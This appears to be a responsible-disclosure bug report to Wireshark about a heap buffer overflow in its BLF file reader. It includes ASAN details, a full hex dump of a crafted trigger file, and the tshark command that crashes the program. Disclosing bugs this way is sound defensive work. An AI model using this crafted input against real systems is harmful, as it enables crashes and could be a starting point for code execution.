Heap buffer overflow vulnerability in BLF reader
Description:
A heap-buffer overflow vulnerability has been discovered in Wireshark's Binary Logging Format (BLF) file processing. The vulnerability occurs in the blf_pull_logcontainer_into_memory()
function in the wiretap/blf.c
file. The vulnerability could be exploited by providing a maliciously crafted BLF file, which could lead to arbitrary code execution.
Tested on: Ubuntu 22.04.2 LTS
Details:
The overflow is triggered by a call to memcpy (displayed as __asan_memcpy in the ASAN output), copying 28 bytes into a memory region that is only 15 bytes large. This region was allocated in blf_pull_logcontainer_into_memory
using calloc
at wiretap/blf.c:499
.
After the overflow, the program execution continues until it attempts to allocate memory with malloc
in wmem_strdup_printf
(as part of error handling), causing a crash with the message malloc(): corrupted top size
.
Steps to reproduce:
$ xxd -g1 trigger
00000000: 4c 4f 47 47 30 00 00 00 30 30 30 30 30 30 30 30 LOGG0...00000000
00000010: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000020: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000030: 4c 4f 42 4a 10 00 01 00 0f 00 00 00 0a 00 00 00 LOBJ............
00000040: 02 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 ..00000000000000
00000050: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000060: 30 30 30 30 30 30 30 30 30 30 30 30 000000000000
$ tshark -r trigger
malloc(): corrupted top size
Aborted
For a more detailed understanding of this vulnerability, I've attached the following files:
- Trigger File: This is the crafted BLF file that provokes the heap buffer overflow when processed by Wireshark.
- ASAN Output: AddressSanitizer's (ASAN) report provides additional insight into the memory corruption.
- GDB Backtrace of Tshark: This backtrace reveals the call sequence leading up to the crash in Wireshark's Tshark utility.
- GDB Backtrace of the Fuzzer
I'd also like to request a CVE ID for this vulnerability.
Please let me know if you need any additional information or assistance in addressing this vulnerability.
Regards,
Huáscar
trigger ASAN.txt GDB_Backtrace_tshark.txt GDB_Backtrace_fuzzer.txt